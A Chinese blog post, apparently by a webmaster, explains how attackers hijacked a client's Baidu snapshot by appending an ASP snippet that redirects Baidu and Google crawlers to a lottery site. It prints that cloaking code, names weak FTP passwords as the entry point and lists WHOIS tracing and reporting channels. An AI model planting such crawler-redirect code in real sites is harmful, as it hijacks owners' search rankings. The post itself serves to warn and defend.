黑客是怎么篡改百度快照的?

所属分类: 网站运营 / 其它相关 阅读数: 110
收藏 0 赞 0 分享

  写本篇文章的目的在于揭露一种黑客作弊的手段,也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。

  前几日,我的客户电话说自己的百度排名没有了,查询下竟然百度标签显示的内容是一家彩票平台的网站内容。 我知道网站被黑客加入了非法代码,恶意篡改了百度快照。(截图如下)

  查看“百度快照”出现的是一组跳转网站的广告内容。我们对客户设置的网站信息消失了。

 

  1、黑客是如何修改百度快照的呢?

  我进行了排查,客户的网站是使用asp源码开发的。发现有个文件被黑客写入了一段代码。

  路径:Inc文件夹—SysProduct.asp文件里面最底下添加了如下代码:

<%

function Getbot()

dim s_agent

GetBot=""

s_agent=Request.ServerVariables("HTTP_USER_AGENT")

if instr(1,s_agent,"googlebot",1) > 0 then

GetBot="google"

end if

if instr(1,s_agent,"baiduspider",1) > 0 then

GetBot="baidu"

end if

end function

if GetBot="baidu" or GetBot="google" then

'

Response.Redirect "http://*********"(跳转的网站,引导百度抓取的内容)

else

'

Response.Write""

end if

%>

  黑客设置的这串代码导致百度爬虫抓取网页的时候,直接抓取越过客户网站抓取了跳转网站内容,导致百度快照里面显示的是别的内容。使得客户本来排名首页的网站直接被百度屏蔽了。造成了客户很大的损失。

  2、那么黑客是如何进入后台的呢?

  黑客要进入后台,必须知道FTP账户和密码,以及IP地址。

  造成的原因有如下几种:

  1)一方面是FTP密码设置的时候比较简单化,很容易被利用软件破解掉,

  2)另一方面选择便宜的空间也是一种隐患。因为空间IP以及用户名是很难被知道的,除非有人提供。

  3、网站被黑之后,你如何追查黑客的来源?

  方法比较简单,就是查询你跳转的目标网站的域名信息。一般情况下,都是一些小型的站长开发的赚钱网站,通过查询域名信息你可以获知该域名的归属人是谁,他有可能就是黑你网站的人。

  如果是比较大型的网站利用外包的方式进行推广,那么你也可以得知负责人,给百度或者是网络警察举报一下,该网站存在恶意攻击修改内容的行为,毕竟它也有一定得责任。

  通过中国万网Whois域名查询:比如我客户跳转的彩票网站的域名信息如下:

  1)第一个是:注册人

  2)第二个是:联系电话

  3)第三个是:联系邮箱

  基本上你联系注册人就可以解决问题。如果对你客户造成的损失太大的话,建议你通过以下方式进行维权:

  违法和不良信息举报中心:http://net.china.cn/

  12321网络不良与垃圾信息举报受理中心:http://www.12321.cn/

  国家互联网应急中心网络安全举报中心:http://www.cert.org.cn/

  中国反钓鱼网站联盟认定及处理流程: http://www.cnnic.cn/

  公安部信息网络安全报警网站:http:// http://www.cnnic.cn/

  中国扫黄打非网:http://www.shdf.gov.cn/

  北京市公安局网络违法犯罪举报网站:http://www.bj.cyberpolice.cn/index.jsp

  希望本篇文章对你防黑有帮助。

更多精彩内容其他人还在看

为什么蓝翔营销能成功?关于蓝翔营销的解读

最近网络上很火的就是关于蓝翔挖掘机学校的软文,相信那句
收藏 0 赞 0 分享

使用Google DNS 8.8.8.8会导致迅雷下载速度变慢

迅雷下载核心的技术人员在在测试过程中发现,如果电脑使用Google提供的DNS服务(8.8.8.8、8.8.4.4)作为系统默认DNS服务器,就会明显出现下载速度变慢,解决此问题,就只能使用原来的本地DNS地址
收藏 0 赞 0 分享

加速乐 美国IP是我国政府教育类网站头号攻击源

5月20日消息,昨日美国司法部宣布以所谓网络窃密为由起诉5名中国军官,此消息公布后,引起了网民一片吐槽,舆论一致认为自美国NSA窃听事件曝光后,美国从未就此正式向各国道歉,反而贼喊捉贼,实乃掩耳盗铃
收藏 0 赞 0 分享

域名被盗怎么办 如何防止域名被盗

域名是整个网站的核心和关键,一旦域名被盗,且转移到其他注册商,将给域名所有人带来巨大的损失,域名被盗后站长索回异常困难。如何防止域名被盗,小编简单整理了一下,希望对大家有帮助
收藏 0 赞 0 分享

什么是电子邮件营销(Email营销、EDM营销)

这篇文章主要介绍了什么是电子邮件营销,包括常见的Email营销、EDM营销都是一个意思,那就是通过电子邮件的形式向目标客户传送有价值信息的一种较为直接的网络营销手段,本文还介绍了为什么要做邮件营销以及如何做好邮件营销,需要的朋友可以参考下
收藏 0 赞 0 分享

百度搜索出现故障(文件格式 html版) 加速乐提醒网站加强运维

在端午节后的第1天(2014.6.3)下午15:50分左右,百度搜索疑似出现故障,搜索结果显示文件格式HTML版,截止目前仍未恢复。加速乐从百度处获悉,官方已经在抓紧修复
收藏 0 赞 0 分享

丁道师:迅雷上市 有一致命问题未解

昨日晚间,迅雷在纳斯达克正式挂牌,开盘价为14.2美元,较发行价上涨18.4%,盘中市值超过10亿美元,股票交易代码为XNET。摩根大通公司、花旗集团、Stifel Nicolaus和奥本海默为迅雷IPO的主承销商。但迅雷上市 有一致命问题未解,什么致命问题,且来谈谈丁道师的解说
收藏 0 赞 0 分享

苹果急了!也想在移动广告领域里分一杯羹?

近日,苹果就App Store中的应用审核中制定了新规则,瞬间就激起千层浪。此次新的规则却是针对移动广告方面,而这将影响到很多人的身家性命,甚至对整个移动互联网的玩法都有着巨大的影响。难道苹果终于按捺不住,想在移动广告领域里分一杯羹?
收藏 0 赞 0 分享

国内网站常用的一些 CDN 公共库加速服务小结

CDN公共库是指将常用的JS库存放在CDN节点,以方便广大开发者直接调用。与将JS库存放在服务器单机上相比,CDN公共库更加稳定、高速。
收藏 0 赞 0 分享

小米4发布前说说小米的三个生存逻辑

从黑马到新宠再到市场一霸,在赞扬与批评声中,是什么让这个始终处于风口浪尖的科技公司依旧屹立不倒,逐渐强大的小米又有着什么样的生存逻辑呢
收藏 0 赞 0 分享
查看更多